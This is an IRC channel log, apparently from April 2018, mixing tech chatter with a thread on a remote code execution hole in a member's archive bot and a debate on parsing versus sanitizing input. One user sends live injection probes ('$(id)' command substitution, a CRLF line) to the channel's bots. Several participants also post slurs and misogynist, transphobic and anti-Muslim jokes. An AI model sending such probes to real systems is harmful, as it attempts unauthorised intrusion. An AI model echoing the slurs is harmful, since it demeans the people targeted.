deedbot: http://qntra.net/2018/04/british-government-lab-admits-no-evidence-for-scandal-used-to-blow-up-diplomatic-relations-and-court-european-sympathy/ << Qntra - British Government Lab Admits No Evidence For Scandal Used To Blow Up Diplomatic Relations And Court European Sympathy
mircea_popescu: BingoBoingo mind redirecting www to . sometime too ?
asciilifeform: umm qntra down ??
BingoBoingo: mircea_popescu: Sure, I will take a look at it
mircea_popescu: try without the www
asciilifeform: or nm worx
a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png
mircea_popescu: "in natural languages, we are used to context. indeed, contextual meaning is what makes natural languages natural. we have `list' as a verb, and we have `list' as a noun. we have `listless' as an adjective describing something (like a programming language) that does not have lists, and an adjective describing someone who is sort of permanently tired. when we need to disambiguate, we do so with more words."
mircea_popescu: this actually misses the all-important mechanism. "when we need to disambiguate, we add more words such as to contradict one of the two possible solutions the string could eval to"
mircea_popescu: whole fucking natural language is nothing beyhond "add aix^i terms until the damned P has only one real root."
mircea_popescu: and "default" is not a perfectly reasonable variable name holy shit. is this guy going to name his daughter "Cunt" ?
asciilifeform: mircea_popescu: yay! and yes.
asciilifeform: 2 per crate.
shinohai: > Bans gun videos, gets live-action shooting instead http://archive.is/NyMvo
trinque: shinohai: https://archive.is/TgtPb << breitbart didn't neglect the "wearing a headscarf" deets
shinohai: Allah snackbar!
asciilifeform: 'We are seeing @YouTube employees being brought out with hands up!' << lol
trinque: they didn't offer up their assholes quick enough?
douchebag: glad work is over
douchebag: Fucking had this dude from work looking over my shoulder
douchebag: asking questions about everything I type in my terminal
mircea_popescu: what sort of chickenfarm do you work in lol
douchebag: Most of the people there are alright
douchebag: This is just new kid who just likes asking too many questions
asciilifeform: damn i had nfi douchebag were chained to an oar. suxx.
douchebag: and doesn't understand it's considered disrespectful to stare at someone elses computer screen
douchebag: nfi?
mircea_popescu: no fucking idea
douchebag: Yeah no it was fine most of the day, this kid would just get out of his seat and stand behind me and start staring at what I was doing and asked a bunch of questions
douchebag: how about that shooting though
douchebag: so much for mass shooting being a men only sort of deal
asciilifeform: bbut lead is banned in californistan!111
asciilifeform: what nao, ban tits ?
douchebag: lolol
douchebag: asciilifeform: Only womens tits
douchebag: Tranny tits are a-okay in California
mircea_popescu: basically "liberation" and "4th wave feminism" consists of a bunch of male dweebs with no utility that nobody wants appropriating feminity and taking over boobs.
mircea_popescu: ain't enough they kicked women out of the last well paying job available to them (nursing), now they're gonna steal the tits, too ?
asciilifeform: lol waitasec this was a trans-postal?
mircea_popescu: nfi, i was discussing the "women in tech" trend generally.
mircea_popescu: there's by now a large and visible class of dweebs who considered the "should i learn github or get boobs" dilemma and came out with "better get boobs -- govt pays for it."
douchebag: Men need to stop acting like women and women need to stop acting like men, imo
mircea_popescu: men can't stop acting like women -- there's really nothing else for them.
asciilifeform: in other 'holyfuq, chinesium', 1500000 (!) baud default uart.
asciilifeform in fact was not able to find a single usb uart that will reliably rx it: had to use logic analyzer
asciilifeform did in the end find one : ye olde ft232
shinohai: http://therealbitcoin.org/ml/btc-dev/2018-April/000295.html << ty jurov for handling donation, cheers! [~]D
mod6: Hey, thanks for your donation shinohai!
shinohai: cheers as well! o7
douchebag: just buy the fucking water filters already
lobbes: oy, yup this is the spoofed user agent that the phantomjs portion of the process was using. RCE was happening both at the bash level AND via the headless browser.. I got poked in several orifices >> http://btcbase.org/log/2018-04-03#1792665
a111: Logged on 2018-04-03 19:52 a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png
lobbes: !!v B7975B7CA5C064DEC53DCE43D14C35C0F1D735FB0F849EE418B922F3A81502F5
deedbot: lobbes rated douchebag 2 << exploited several security holes in my archive process, but was nice enough to tell me rather than pwn me
douchebag: lobbes: Mind sharing the source code? I could perhaps help you identify further exploits
douchebag: i wonder
douchebag: !!ratings douchebag
douchebag: !!reputation douchebag
lobbes: my plan tonight is to go through and map out whole process (I'll probably tar up my code after I attempt to sanitize inputs), will bake a blog post exposing my naivete to forum at large
lobbes: I gotta learn somehow
phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there?
shinohai: dont be so hard on self, supbybot/limnoria is broken so beautifully anyway
douchebag: lobbes: I'll help you make your bot more secure
lobbes: ty douchebag! much appreciated
lobbes: and shinohai, as much as I'd like to blame this on supybot, this one is all me (the exploited code was all brewed by yours truly)
douchebag: Just tell me essentially what it is you're trying to do, what you have already tried, and then I'll suggest you how to write it properly
shinohai: O.o nb lobbes
lobbes: douchebag well, it is very convoluted atm. besides, I'd rather there be a static page I can point to than just barfing it in the logs
lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648
a111: Logged on 2018-04-03 19:41 mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long.
lobbes bbl food
douchebag: Forsure, I'm rather experience with application design from a security prespective so just let me know if you have any questions
douchebag: Just make sure a problem like that doesn't occur again. Remote code execution is just as bad as it can get
trinque: heh, meanwhile, all of sexual reproduction is based on getting those RCEs
douchebag: trinque: That's true
douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children
douchebag: PWN BOXES 2 HELP THE CHILDREN
trinque: why, is that's what sperm do, my man.
douchebag: eventually
a111: Logged on 2016-09-17 02:55 mircea_popescu: trinque fancy that, you had to have someone tell you! nature teaches by example, you stick more data into woman each time than you ever did into all machines you ever touched. yet...
douchebag: trinque: What other bots are in here besides lobbes and deedbot
asciilifeform: pehbot !
douchebag: whats the syntax
trinque: ^ and mimisbrunnr
asciilifeform: !!up pehbot
deedbot: pehbot voiced for 30 minutes.
douchebag: also syntax for mimisbrunnr
asciilifeform: !A help
pehbot: asciilifeform: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32.
trinque: I think mimisbrunnr only quotes log-lines; it's ben_vulpes'
asciilifeform: !#s pehbot
asciilifeform: ^ see also.
douchebag: !#s $(id)
a111: Logged on 2018-04-03 19:51 mircea_popescu: BingoBoingo mind redirecting www to . sometime too ?
douchebag: !#help
douchebag: !A 'help
pehbot: douchebag: EGGOG: Pos: 0: Stack Underflow!
douchebag: !A ''help
pehbot: douchebag: EGGOG: Pos: 0: Stack Underflow!
douchebag: !A help
pehbot: douchebag: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32.
trinque: any chance this can be done in pm asciilifeform ?
mod6: ^
trinque: before someone gets cranky?
douchebag: I agree
mod6: to late
asciilifeform: trinque: not as such. BUT he really oughta build the proggy and do in his own shell.
trinque: there ya go.
douchebag: can I try one last command really quick?
douchebag: !#s \r\nTEST
douchebag: Good job stripping them !
asciilifeform: actually, douchebag , it does no such thing
asciilifeform: well, pehbot that is
douchebag: I was talking about a111
douchebag: If those lines weren't stripped I could potentially send my own commands to the ircd
asciilifeform: i've temporarily moved it to #asciilifeform-test, douchebag , justforyou !
douchebag: thx <3
asciilifeform: plz join.
phf: which reminds me that i should implement the help feature, a111 is no conformant at the moment
phf: douchebag: a111 logs, speaks logs, responds to #!s #!seen #!seenbefore #!born and #!vulpes
phf: of which only #!s and #!seen are useful, and #!born mildly interesting
phf: #!born douchebag
phf: !#born douchebag
a111: 2018-01-11 <douchebag> douchebag
phf: well, since we're testing things http://btcbase.org/log/2018-04-03#1231231231231
douchebag: phf: What sort of topics do you primarily focus on?
douchebag: In regards to programming/security/technology ect..
phf: it really depends on when
phf: but relevant to the conversation, i grew up in russia in the 90s, so i did infosec until 2005 or so
phf: there might be an xss somewhere in btcbase, but highly unlikely
phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues
phf: so cl-irc isn't "stripping away" faulty sequences, there's a state machine parser there that only accepts a valid irc protocol, likewise the renderer is not escaping html, instead the dom is constructed server side and where you have strings, you can only have strings. they will be serialized into html according to html escaping rules.
asciilifeform: phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa ; but loox like no dice so far
asciilifeform: going by the log in #asciilifeform-test, d00d 1) still refuses to actually read the proggy 2) continues to think that it remaining standing has something at all to do with 'sanitizing' or anticipating whatever attack
douchebag: I've never programmed in the language it was written in
douchebag: So it makes it a bit difficult
asciilifeform: being one of the few languages with actual docs, and of which i used a deliberately small subset -- oughta be pretty simple.
asciilifeform: ( oop for instance is not used. nor is heap allocation . )
asciilifeform: meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.'
asciilifeform: and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure.
lobbes: so, this is kind of like the "default-deny" philosophy? "you may only build the house from this valid list of materials" versus "grab any material you can find, but watch out for this list of lethal building materials"? >> http://btcbase.org/log/2018-04-04#1792809
a111: Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues
trinque: the grammar asserts what ought to be there; it rejects everything else, but it didn't reject the "all else" item by item.
lobbes: hm yeah, applying this to my case: there is only ONE point where user-entered data enters into the process, and that is where the bot snarfs from the chan and inserts into the first sqlite3 db. So really, I just need to teach THAT part of my process what a valid url is, and then parse accordingly
trinque: parser implements a given grammar, turning a string (whether considered as text or raw bits) into an abstract syntax tree
lobbes: hm okay, this is a bit over my head, but you are saying that I need to understand what the grammar for a url is, and then have the parser follow that grammar?
douchebag: lobbes: Why not completely avoid sending any user input to a bash interpreter at all?
lobbes: well, it seems like phf's (and others') approach is slightly saner. Even if user input doesn't go to bash, well.. what about the phantomjs exploit you found
lobbes: I cannot possibly enumerate what I haven't thought of
lobbes: but I CAN enumerate a valid url
trinque: sure douchebag, not saying do that either
lobbes: yeah, true, I really should do both
lobbes: there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything
lobbes: ala deedbot and other items
asciilifeform: hey trinque , i was attempting a gentoo , and found that i cannot even extract a 2016 stage3 on a sane box because --xattrs-include='*.*' and my tar has nfi what xattrs are
asciilifeform: trinque: any idea when this liquishit crept in ?
asciilifeform: what's the most recent stage3 that hasn't got it ?
mircea_popescu: http://btcbase.org/log/2018-04-03#1792728 << yes, actually. x could not be y, but opt to not-not be y. is this bad ?
a111: Logged on 2018-04-03 23:41 phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there?
asciilifeform: incidentally trinque do you know of a musltronic stage3 for arm ?
mircea_popescu: http://btcbase.org/log/2018-04-03#1792736 << it's not that big. but, if indeed it is that big this is a reason to find more storage space, can't really cut them off.
a111: Logged on 2018-04-03 23:48 lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648
a111: Logged on 2018-04-03 23:53 douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children
mircea_popescu: !!up candi_lustt
deedbot: candi_lustt voiced for 30 minutes.
mircea_popescu: ^ there douchebag , now you can learn lips.
mircea_popescu: and in other "best villains of the silver screen", https://www.youtube.com/watch?v=-N9LnkKQfuc
mircea_popescu: #!born douchebag
mircea_popescu: !#born phf
a111: 2014-03-20 <phf> not quite
mircea_popescu: phf it's supposed to produce no more than one line per command.
mircea_popescu: http://btcbase.org/log/2018-04-04#1792811 << this is not something that can be "grasped" as such.
a111: Logged on 2018-04-04 00:46 asciilifeform: phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa ; but loox like no dice so far
mircea_popescu: much in the vein astronomy can not be grasped playing with ptolemaic spheres.
a111: Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues
mircea_popescu: i mean my talk to ro politicians about basic economics from like 2005 is on the fucking web ffs!
mircea_popescu: and the time i burned the koran/bible and the time i stabbed that rabbit and so following.
asciilifeform actually watches the 2005 one , it was lulzy
asciilifeform: *watched
mircea_popescu: dja understand what it says ?
asciilifeform: at the time understood maybe half . really oughta rewatch these days
mircea_popescu: http://trilema.com/2009/banii-oamenii-si-valorile-liberale/ << uncharacteristically for vloggers, transcript is available.
asciilifeform: oh hah.
asciilifeform: this almost takes out all the sport tho.
mircea_popescu: incidentrally, the comments are something else.
asciilifeform: http://p.bvulpes.com/pastes/LsmJG/?raw=true << d00d's total effort in re pehbot , thus far.
mircea_popescu: im sure he'll say something if he finds something neh
asciilifeform: doesn't show any symptoms of approaching the thing in any way other than http://btcbase.org/log/2016-05-01#1460013
a111: Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS ; and so does "GET /blog/blog-config.php~".
mircea_popescu: eh, what;'s the rush.
mircea_popescu: http://btcbase.org/log/2018-04-04#1792817 << fuck 'em. let them sell to each other for bitpaybux until they fall over for all i care.
a111: Logged on 2018-04-04 01:06 asciilifeform: meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.'
mircea_popescu: http://btcbase.org/log/2018-04-04#1792818 << the english web is empty of EVERYTHING. there isn't anything there. i looked.
a111: Logged on 2018-04-04 01:06 asciilifeform: and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure.
asciilifeform: mircea_popescu: it's chinese, therefore lulzy. mine seems to boot up with the shitrom broken...
mircea_popescu: yes but it probably doesn't have $random-useless-feature!!1
asciilifeform: boots -- believe or not -- a gentoo.
asciilifeform: as of 5min ago.
mircea_popescu: http://btcbase.org/log/2018-04-04#1792831 << this is the worst choice, in general.
a111: Logged on 2018-04-04 02:19 lobbes: there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything
a111: Logged on 2018-04-04 02:30 asciilifeform: trinque: any idea when this liquishit crept in ?
mircea_popescu: fwiw, iirc reiserfs has them too.
asciilifeform: it's in tar.
asciilifeform: from 1.27 and up.
asciilifeform: q for trinque was , when did gentoo stage3 start using this 'feature'.
mircea_popescu: probably once they started supporting ext4.
mircea_popescu: anyway, odds are you can just take it out.
asciilifeform: nope. $box supports ext4 , but tar 1.26.
mircea_popescu: just drop the flag, see what happens.
asciilifeform: and i untarred in spite of this oddity, and the only barf was that python, ping, and cc1 binaries failed to extract. but oddly enuff extracted later manually...
asciilifeform: and appear to work
mircea_popescu: anyway. extended attributes is this ~dead standard that got implemented anyway, basically a kludgy extension of chown.
asciilifeform did realize this
mircea_popescu: the flag tells tar whether to store this extra metadata with the files or not. generally droppoing it has no effect. ah ok then
trinque couldn't say, haven't tilted at tar just yet
← 2018-04-02 | 2018-04-04 →